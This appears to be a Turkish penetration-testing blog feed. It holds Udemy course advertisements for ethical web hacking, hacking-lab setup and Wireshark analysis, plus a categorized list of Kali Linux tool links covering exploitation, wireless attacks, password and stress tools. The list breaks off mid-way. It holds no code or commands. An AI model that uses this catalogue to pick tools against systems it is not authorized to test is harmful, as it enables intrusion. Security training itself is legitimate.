tag:blogger.com,1999:blog-91898010136963658582024-03-19T12:08:22.277+03:00Penetration Testing, Web Application Security,Network SecurityPentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.comBlogger53125tag:blogger.com,1999:blog-9189801013696365858.post-44039100129144810502018-04-23T19:09:00.000+03:002018-04-23T19:09:07.754+03:00Etik Web Hacking Yöntemleri <div style="text-align: center;">
<a href="https://www.udemy.com/uygulamali-etik-web-hacking-yontemleri/">https://www.udemy.com/uygulamali-etik-web-hacking-yontemleri/</a><span id="goog_997354856"></span><a href="https://draft.blogger.com/"></a><span id="goog_997354857"></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPwQnEDa8LG72LIy1QWPRv7i4MJBy-784APxAh1_vMt-xKSC_b35QWmLw-y8fIapEIi7t5sOFK7aRW09vCHE40a4TTYCe6ZmhtSusxMMSLZeVGQiltRWYUlOt3_8GwQ9VTNWSl-EdAFcc/s1600/etik.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="659" data-original-width="1136" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPwQnEDa8LG72LIy1QWPRv7i4MJBy-784APxAh1_vMt-xKSC_b35QWmLw-y8fIapEIi7t5sOFK7aRW09vCHE40a4TTYCe6ZmhtSusxMMSLZeVGQiltRWYUlOt3_8GwQ9VTNWSl-EdAFcc/s400/etik.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
Etik Web Hacking Yöntemleri, gerçek bir lab ortamında yapılan web
hacking-penetrasyon işlemlerini orta düzeyde gösteren anlaşılır ve
uygulanabilir bir eğitimdir. Eğitimde amaç;piyasadaki mevcut hacking
işlemlerini yasal çerçevenin dışına çıkmadan ve profesyonel bir şekilde
gerçek örneklerle öğretmeyi amaçlar.<br />
Bu eğitimde tüm araçlar ücretsiz ve erişilebilir yapıdadır. Eğitimde
web hacking alanında metodoloji takip edilerek yapılacaktır.Bu
metodoloji;<br />
<ol>
<li>Bilgi Toplama</li>
<li>Zafiyet Tespit Etme</li>
<li>Erişim</li>
<li>Yetki Yükseltme safhalarından oluşmaktadır. </li>
</ol>
Her bir aşamada o alana ait araçlar ile işlemler yapılarak olayın mantığı öğretilmeye çalışılmıştır.<br />
<br />
Sizde web hacking ve penetrasyon işlemlerinde yetkinlik kazanmak ve
uygulanabilir teknikler öğrenmek isterseniz mutlaka bu eğitimi satın
alın. Eğitimde kupon kodu için lütfen benimle iletişime geçin.Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-75703808016135318142018-04-23T19:06:00.000+03:002018-04-23T19:06:47.050+03:00Creating Hacking Lab<div style="text-align: center;">
<a href="https://www.udemy.com/creating-hacking-lab/" target="_blank"><b>Hacking ve Pentest işlemleri için Laboratuvar Kurma </b> </a> </div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjynPAwwTRVWKhGWwuSw-3yEpuOERuq8VE8x5p1-W0amW_GxkvtTAVWihXiMKiWRe2FRg5_xtcQvMVHYeH25j4ZlL_W0L7Fg3bn5_LvgLjkA2TGXHIZqlzE_KrusSyLYXBf8s2Vy5AoYf4/s1600/create.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="722" data-original-width="1126" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjynPAwwTRVWKhGWwuSw-3yEpuOERuq8VE8x5p1-W0amW_GxkvtTAVWihXiMKiWRe2FRg5_xtcQvMVHYeH25j4ZlL_W0L7Fg3bn5_LvgLjkA2TGXHIZqlzE_KrusSyLYXBf8s2Vy5AoYf4/s400/create.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Creating Hacking Lab eğitimi;<br />
Sanal dünyada test etmek
istediğiniz pentest ve hacking işlemlerini daha gelişmiş araçlarla ve
detaylı incelemek için kendi laboratuvar ortamınızı kurun.<br />
Web,Network,Wireless,Mobil
Hacking / Penetrasyon işlemlerini daha sağlıklı ve güvenle test
etmenize olanak sağlayan bu yapıda çoğu ücretsiz ve açık kaynak kodlu
araçlarla tecrübenizi arttırabilir ve bu alanlarda uzmanlaşabilirsiniz.<br />
Kendi laboratuvar ortamınızda;<br />
<ul>
<li>Web hacking </li>
<li>Network Hacking </li>
<li>Domain ortamına yönelik saldırıları</li>
<li>Wireless Network Saldırılarını</li>
<li>Mobil Saldırılarını çok rahat bir şekilde test edebileceksiniz.</li>
</ul>
Ayrıca temel bazı konfigürasyonlar hakkında bilgi sahibi olacaksınız.<br />
Lab
ortamını daha gelişmiş araçlarla donatarak kapsamlı hacking / pentest
işlemlerini gerçekleştirebilirsiniz. IPS-IDS sistemlerini laboratuvar
ortamına taşıyarak gelişmiş atak çeşitleri ile tecrübenizi arttırabilir
ve gerekli güvenlik testlerini yapabilirsiniz.<br />
Bu eğimden sonra
yine oluşturduğumuz lab üzerinden sırasıyla web,network,wireless,mobil
hacking / pentest ve Network Forensic,Kali 101 eğitimleri
gerçekleştirilecektir. Bu sayede hem laboratuvar kurma hem atakları
gerçek laboratuvar ortamında test etme imkanına kavuşacaksınız.Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-54974724972128741332018-04-23T19:04:00.002+03:002018-04-23T19:04:32.209+03:00Wireshark ile Network Trafik Analizi<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1XZJItyZR0-rfMXjm_iOFlUabEmvtJ5JtehDJzqcsOynRVzzSmsgpNsFAscwJWKoJuG6q8tcqAmFZQ7cBfnAz14xcMeR2wId3JV9TmM9E2A-BpCWGeYz8MS98L-VUZkXDdTFeAQXtA5g/s1600/wireshark.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="1141" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1XZJItyZR0-rfMXjm_iOFlUabEmvtJ5JtehDJzqcsOynRVzzSmsgpNsFAscwJWKoJuG6q8tcqAmFZQ7cBfnAz14xcMeR2wId3JV9TmM9E2A-BpCWGeYz8MS98L-VUZkXDdTFeAQXtA5g/s400/wireshark.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://www.udemy.com/wireshark-ile-network-trafik-analiz-egitimi/" target="_blank">Wireshark ile Network Analiz Eğitimi</a>, temel anlamda
TCP/IP yapısını anlama,network trafiğini kolay ve anlaşılır bir şekilde
analiz etme ve problemlere çözüm bulmayı kolaylaştıran bir eğitimdir. <br />
Bu eğitim serisinde derslerin önce teorik yapısı ardından da gerçek veriler üzerinden analiz süreci anlatılıyor. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Wireshark ile Network Analiz Eğitimi;TCP/IP yapısını temelden
öğrenmek isteyenler,network trafiğinin problemlerini kolayca çözmek
isteyenler,güvenlik açıklarını analiz edenler için çok güzel bir eğitim
serisidir. <br />
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com1tag:blogger.com,1999:blog-9189801013696365858.post-28134824623771899502015-11-16T09:21:00.001+02:002015-11-16T09:21:20.951+02:00KALI TOOLS
<div class="post-1840 page type-page status-publish hentry" id="post-1840">
<div class="entry">
<div class="one_fourth">
<h5>
Information Gathering</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/information-gathering/acccheck" title="acccheck">acccheck</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ace-voip" title="ace-voip">ace-voip</a> </li>
<li><a href="http://tools.kali.org/information-gathering/amap" title="Amap">Amap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/automater" title="Automater">Automater</a> </li>
<li><a href="http://tools.kali.org/information-gathering/bing-ip2hosts" title="bing-ip2hosts">bing-ip2hosts</a> </li>
<li><a href="http://tools.kali.org/information-gathering/braa" title="braa">braa</a> </li>
<li><a href="http://tools.kali.org/information-gathering/casefile" title="CaseFile">CaseFile</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cdpsnarf" title="CDPSnarf">CDPSnarf</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cisco-torch" title="cisco-torch">cisco-torch</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cookie-cadger" title="Cookie Cadger">Cookie Cadger</a> </li>
<li><a href="http://tools.kali.org/information-gathering/copy-router-config" title="copy-router-config">copy-router-config</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dmitry" title="DMitry">DMitry</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnmap" title="dnmap">dnmap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnsenum" title="dnsenum">dnsenum</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnsmap" title="dnsmap">dnsmap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnsrecon" title="DNSRecon">DNSRecon</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnstracer" title="dnstracer">dnstracer</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnswalk" title="dnswalk">dnswalk</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dotdotpwn" title="DotDotPwn">DotDotPwn</a> </li>
<li><a href="http://tools.kali.org/information-gathering/enum4linux" title="enum4linux">enum4linux</a> </li>
<li><a href="http://tools.kali.org/information-gathering/enumiax" title="enumIAX">enumIAX</a> </li>
<li><a href="http://tools.kali.org/information-gathering/exploitdb" title="exploitdb">exploitdb</a> </li>
<li><a href="http://tools.kali.org/information-gathering/fierce" title="Fierce">Fierce</a> </li>
<li><a href="http://tools.kali.org/information-gathering/firewalk" title="Firewalk">Firewalk</a> </li>
<li><a href="http://tools.kali.org/information-gathering/fragroute" title="fragroute">fragroute</a> </li>
<li><a href="http://tools.kali.org/information-gathering/fragrouter" title="fragrouter">fragrouter</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ghost-phisher" title="Ghost Phisher">Ghost Phisher</a> </li>
<li><a href="http://tools.kali.org/information-gathering/golismero" title="GoLismero">GoLismero</a> </li>
<li><a href="http://tools.kali.org/information-gathering/goofile" title="goofile">goofile</a> </li>
<li><a href="http://tools.kali.org/information-gathering/hping3" title="hping3">hping3</a> </li>
<li><a href="http://tools.kali.org/information-gathering/intrace" title="InTrace">InTrace</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ismtp" title="iSMTP">iSMTP</a> </li>
<li><a href="http://tools.kali.org/information-gathering/lbd" title="lbd">lbd</a> </li>
<li><a href="http://tools.kali.org/information-gathering/maltego-teeth" title="Maltego Teeth">Maltego Teeth</a> </li>
<li><a href="http://tools.kali.org/information-gathering/masscan" title="masscan">masscan</a> </li>
<li><a href="http://tools.kali.org/information-gathering/metagoofil" title="Metagoofil">Metagoofil</a> </li>
<li><a href="http://tools.kali.org/information-gathering/miranda" title="Miranda">Miranda</a> </li>
<li><a href="http://tools.kali.org/information-gathering/nmap" title="Nmap">Nmap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ntop" title="ntop">ntop</a> </li>
<li><a href="http://tools.kali.org/information-gathering/p0f" title="p0f">p0f</a> </li>
<li><a href="http://tools.kali.org/information-gathering/parsero" title="Parsero">Parsero</a> </li>
<li><a href="http://tools.kali.org/information-gathering/recon-ng" title="Recon-ng">Recon-ng</a> </li>
<li><a href="http://tools.kali.org/information-gathering/set" title="SET">SET</a> </li>
<li><a href="http://tools.kali.org/information-gathering/smtp-user-enum" title="smtp-user-enum">smtp-user-enum</a> </li>
<li><a href="http://tools.kali.org/information-gathering/snmpcheck" title="snmpcheck">snmpcheck</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslcaudit" title="sslcaudit">sslcaudit</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslsplit" title="SSLsplit">SSLsplit</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslstrip" title="sslstrip">sslstrip</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslyze" title="SSLyze">SSLyze</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/information-gathering/theharvester" title="theHarvester">theHarvester</a> </li>
<li><a href="http://tools.kali.org/information-gathering/tlssled" title="TLSSLed">TLSSLed</a> </li>
<li><a href="http://tools.kali.org/information-gathering/twofi" title="twofi">twofi</a> </li>
<li><a href="http://tools.kali.org/information-gathering/urlcrazy" title="URLCrazy">URLCrazy</a> </li>
<li><a href="http://tools.kali.org/information-gathering/wireshark" title="Wireshark">Wireshark</a> </li>
<li><a href="http://tools.kali.org/information-gathering/wol-e" title="WOL-E">WOL-E</a> </li>
<li><a href="http://tools.kali.org/information-gathering/xplico" title="Xplico">Xplico</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Vulnerability Analysis</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/vulnerability-analysis/bbqsql" title="BBQSQL">BBQSQL</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/bed" title="BED">BED</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-auditing-tool" title="cisco-auditing-tool">cisco-auditing-tool</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-global-exploiter" title="cisco-global-exploiter">cisco-global-exploiter</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-ocs" title="cisco-ocs">cisco-ocs</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cisco-torch" title="cisco-torch">cisco-torch</a> </li>
<li><a href="http://tools.kali.org/information-gathering/copy-router-config" title="copy-router-config">copy-router-config</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/dbpwaudit" title="DBPwAudit">DBPwAudit</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/doona" title="Doona">Doona</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dotdotpwn" title="DotDotPwn">DotDotPwn</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/greenbone-security-assistant" title="Greenbone Security Assistant">Greenbone Security Assistant</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/gsd" title="GSD">GSD</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/hexorbase" title="HexorBase">HexorBase</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/inguma" title="Inguma">Inguma</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/jsql" title="jSQL">jSQL</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/lynis" title="Lynis">Lynis</a> </li>
<li><a href="http://tools.kali.org/information-gathering/nmap" title="Nmap">Nmap</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/ohrwurm" title="ohrwurm">ohrwurm</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/openvas-administrator" title="openvas-administrator">openvas-administrator</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/openvas-cli" title="openvas-cli">openvas-cli</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/openvas-manager" title="openvas-manager">openvas-manager</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/openvas-scanner" title="openvas-scanner">openvas-scanner</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/oscanner" title="Oscanner ">Oscanner</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/powerfuzzer" title="Powerfuzzer">Powerfuzzer</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sfuzz" title="sfuzz">sfuzz</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sidguesser" title="SidGuesser">SidGuesser</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/siparmyknife" title="SIPArmyKnife">SIPArmyKnife</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlmap" title="sqlmap">sqlmap</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlninja" title="Sqlninja">Sqlninja</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlsus" title="sqlsus">sqlsus</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/tnscmd10g" title="tnscmd10g">tnscmd10g</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/unix-privesc-check" title="unix-privesc-check">unix-privesc-check</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/yersinia" title="Yersinia">Yersinia</a> </li>
</ul>
<h5>
Exploitation Tools</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/exploitation-tools/armitage" title="Armitage">Armitage</a> </li>
<li><a href="http://tools.kali.org/exploitation-tools/backdoor-factory" title="Backdoor Factory">Backdoor Factory</a> </li>
<li><a href="http://tools.kali.org/exploitation-tools/beef-xss" title="BeEF">BeEF</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-auditing-tool" title="cisco-auditing-tool">cisco-auditing-tool</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-global-exploiter" title="cisco-global-exploiter">cisco-global-exploiter</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-ocs" title="cisco-ocs">cisco-ocs</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cisco-torch" title="cisco-torch">cisco-torch</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/crackle" title="crackle">crackle</a> </li>
<li><a href="http://tools.kali.org/web-applications/jboss-autopwn" title="jboss-autopwn">jboss-autopwn</a> </li>
<li><a href="http://tools.kali.org/exploitation-tools/linux-exploit-suggester" title="Linux Exploit Suggester">Linux Exploit Suggester</a> </li>
<li><a href="http://tools.kali.org/information-gathering/maltego-teeth" title="Maltego Teeth">Maltego Teeth</a> </li>
<li><a href="http://tools.kali.org/information-gathering/set" title="SET">SET</a> </li>
<li><a href="http://tools.kali.org/exploitation-tools/shellnoob" title="ShellNoob">ShellNoob</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlmap" title="sqlmap">sqlmap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/yersinia" title="Yersinia">Yersinia</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Wireless Attacks</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/wireless-attacks/aircrack-ng" title="Aircrack-ng">Aircrack-ng</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/asleap" title="Asleap">Asleap</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bluelog" title="Bluelog">Bluelog</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bluemaho" title="BlueMaho">BlueMaho</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bluepot" title="Bluepot">Bluepot</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/blueranger" title="BlueRanger">BlueRanger</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bluesnarfer" title="Bluesnarfer">Bluesnarfer</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bully" title="Bully">Bully</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/cowpatty" title="coWPAtty">coWPAtty</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/crackle" title="crackle">crackle</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/eapmd5pass" title="eapmd5pass">eapmd5pass</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/fern-wifi-cracker" title="Fern Wifi Cracker">Fern Wifi Cracker</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ghost-phisher" title="Ghost Phisher">Ghost Phisher</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/giskismet" title="GISKismet">GISKismet</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/gqrx" title="Gqrx">Gqrx</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/gr-scan" title="gr-scan">gr-scan</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/kalibrate-rtl" title="kalibrate-rtl">kalibrate-rtl</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/killerbee" title="KillerBee">KillerBee</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/kismet" title="Kismet">Kismet</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mdk3" title="mdk3">mdk3</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mfcuk" title="mfcuk">mfcuk</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mfoc" title="mfoc">mfoc</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mfterm" title="mfterm">mfterm</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/multimon-ng" title="Multimon-NG">Multimon-NG</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/pixiewps" title="PixieWPS">PixieWPS</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/reaver" title="Reaver">Reaver</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/redfang" title="redfang">redfang</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/rtlsdr-scanner" title="RTLSDR Scanner">RTLSDR Scanner</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/spooftooph" title="Spooftooph">Spooftooph</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/wifi-honey" title="Wifi Honey">Wifi Honey</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/wifitap" title="Wifitap">Wifitap</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/wifite" title="Wifite">Wifite</a> </li>
</ul>
<h5>
Forensics Tools</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/forensics/binwalk" title="Binwalk">Binwalk</a> </li>
<li><a href="http://tools.kali.org/forensics/bulk-extractor" title="bulk-extractor">bulk-extractor</a> </li>
<li><a href="http://tools.kali.org/forensics/capstone" title="Capstone">Capstone</a> </li>
<li><a href="http://tools.kali.org/password-attacks/chntpw" title="chntpw">chntpw</a> </li>
<li><a href="http://tools.kali.org/forensics/cuckoo" title="Cuckoo">Cuckoo</a> </li>
<li><a href="http://tools.kali.org/forensics/dc3dd" title="dc3dd">dc3dd</a> </li>
<li><a href="http://tools.kali.org/forensics/ddrescue" title="ddrescue">ddrescue</a> </li>
<li><a href="http://tools.kali.org/forensics/dff" title="DFF">DFF</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/distorm3" title="diStorm3">diStorm3</a> </li>
<li><a href="http://tools.kali.org/forensics/dumpzilla" title="Dumpzilla">Dumpzilla</a> </li>
<li><a href="http://tools.kali.org/forensics/extundelete" title="extundelete">extundelete</a> </li>
<li><a href="http://tools.kali.org/forensics/foremost" title="Foremost">Foremost</a> </li>
<li><a href="http://tools.kali.org/forensics/galleta" title="Galleta">Galleta</a> </li>
<li><a href="http://tools.kali.org/forensics/guymager" title="Guymager">Guymager</a> </li>
<li><a href="http://tools.kali.org/forensics/iphone-backup-analyzer" title="iPhone Backup Analyzer">iPhone Backup Analyzer</a> </li>
<li><a href="http://tools.kali.org/information-gathering/p0f" title="p0f">p0f</a> </li>
<li><a href="http://tools.kali.org/forensics/pdf-parser" title="pdf-parser">pdf-parser</a> </li>
<li><a href="http://tools.kali.org/forensics/pdfid" title="pdfid">pdfid</a> </li>
<li><a href="http://tools.kali.org/forensics/pdgmail" title="pdgmail">pdgmail</a> </li>
<li><a href="http://tools.kali.org/forensics/peepdf" title="peepdf">peepdf</a> </li>
<li><a href="http://tools.kali.org/forensics/regripper" title="RegRipper">RegRipper</a> </li>
<li><a href="http://tools.kali.org/forensics/volatility" title="Volatility">Volatility</a> </li>
<li><a href="http://tools.kali.org/information-gathering/xplico" title="Xplico">Xplico</a> </li>
</ul>
</div>
<div class="one_fourth last">
<h5>
Web Applications</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/web-applications/apache-users" title="apache-users">apache-users</a> </li>
<li><a href="http://tools.kali.org/web-applications/arachni" title="Arachni">Arachni</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/bbqsql" title="BBQSQL">BBQSQL</a> </li>
<li><a href="http://tools.kali.org/web-applications/blindelephant" title="BlindElephant">BlindElephant</a> </li>
<li><a href="http://tools.kali.org/web-applications/burpsuite" title="Burp Suite">Burp Suite</a> </li>
<li><a href="http://tools.kali.org/web-applications/cutycapt" title="CutyCapt">CutyCapt</a> </li>
<li><a href="http://tools.kali.org/web-applications/davtest" title="DAVTest">DAVTest</a> </li>
<li><a href="http://tools.kali.org/web-applications/deblaze" title="deblaze">deblaze</a> </li>
<li><a href="http://tools.kali.org/web-applications/dirb" title="DIRB">DIRB</a> </li>
<li><a href="http://tools.kali.org/web-applications/dirbuster" title="DirBuster">DirBuster</a> </li>
<li><a href="http://tools.kali.org/web-applications/fimap" title="fimap">fimap</a> </li>
<li><a href="http://tools.kali.org/web-applications/funkload" title="FunkLoad">FunkLoad</a> </li>
<li><a href="http://tools.kali.org/web-applications/grabber" title="Grabber">Grabber</a> </li>
<li><a href="http://tools.kali.org/web-applications/jboss-autopwn" title="jboss-autopwn">jboss-autopwn</a> </li>
<li><a href="http://tools.kali.org/web-applications/joomscan" title="joomscan">joomscan</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/jsql" title="jSQL">jSQL</a> </li>
<li><a href="http://tools.kali.org/information-gathering/maltego-teeth" title="Maltego Teeth">Maltego Teeth</a> </li>
<li><a href="http://tools.kali.org/web-applications/padbuster" title="PadBuster">PadBuster</a> </li>
<li><a href="http://tools.kali.org/web-applications/paros" title="Paros">Paros</a> </li>
<li><a href="http://tools.kali.org/information-gathering/parsero" title="Parsero">Parsero</a> </li>
<li><a href="http://tools.kali.org/web-applications/plecost" title="plecost">plecost</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/powerfuzzer" title="Powerfuzzer">Powerfuzzer</a> </li>
<li><a href="http://tools.kali.org/web-applications/proxystrike" title="ProxyStrike">ProxyStrike</a> </li>
<li><a href="http://tools.kali.org/information-gathering/recon-ng" title="Recon-ng">Recon-ng</a> </li>
<li><a href="http://tools.kali.org/web-applications/skipfish" title="Skipfish">Skipfish</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlmap" title="sqlmap">sqlmap</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlninja" title="Sqlninja">Sqlninja</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlsus" title="sqlsus">sqlsus</a> </li>
<li><a href="http://tools.kali.org/web-applications/ua-tester" title="ua-tester">ua-tester</a> </li>
<li><a href="http://tools.kali.org/web-applications/uniscan" title="Uniscan">Uniscan</a> </li>
<li><a href="http://tools.kali.org/web-applications/vega" title="Vega">Vega</a> </li>
<li><a href="http://tools.kali.org/web-applications/w3af" title="w3af">w3af</a> </li>
<li><a href="http://tools.kali.org/web-applications/webscarab" title="WebScarab">WebScarab</a> </li>
<li><a href="http://tools.kali.org/web-applications/webshag" title="Webshag">Webshag</a> </li>
<li><a href="http://tools.kali.org/web-applications/webslayer" title="WebSlayer">WebSlayer</a> </li>
<li><a href="http://tools.kali.org/web-applications/websploit" title="WebSploit">WebSploit</a> </li>
<li><a href="http://tools.kali.org/web-applications/wfuzz" title="Wfuzz">Wfuzz</a> </li>
<li><a href="http://tools.kali.org/web-applications/wpscan" title="WPScan">WPScan</a> </li>
<li><a href="http://tools.kali.org/web-applications/xsser" title="XSSer">XSSer</a> </li>
<li><a href="http://tools.kali.org/web-applications/zaproxy" title="zaproxy">zaproxy</a> </li>
</ul>
<h5>
Stress Testing</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/stress-testing/dhcpig" title="DHCPig">DHCPig</a> </li>
<li><a href="http://tools.kali.org/web-applications/funkload" title="FunkLoad">FunkLoad</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/iaxflood" title="iaxflood">iaxflood</a> </li>
<li><a href="http://tools.kali.org/stress-testing/inundator" title="Inundator">Inundator</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/inviteflood" title="inviteflood">inviteflood</a> </li>
<li><a href="http://tools.kali.org/stress-testing/ipv6-toolkit" title="ipv6-toolkit">ipv6-toolkit</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mdk3" title="mdk3">mdk3</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/reaver" title="Reaver">Reaver</a> </li>
<li><a href="http://tools.kali.org/stress-testing/rtpflood" title="rtpflood">rtpflood</a> </li>
<li><a href="http://tools.kali.org/stress-testing/slowhttptest" title="SlowHTTPTest">SlowHTTPTest</a> </li>
<li><a href="http://tools.kali.org/stress-testing/t50" title="t50">t50</a> </li>
<li><a href="http://tools.kali.org/stress-testing/termineter" title="Termineter">Termineter</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
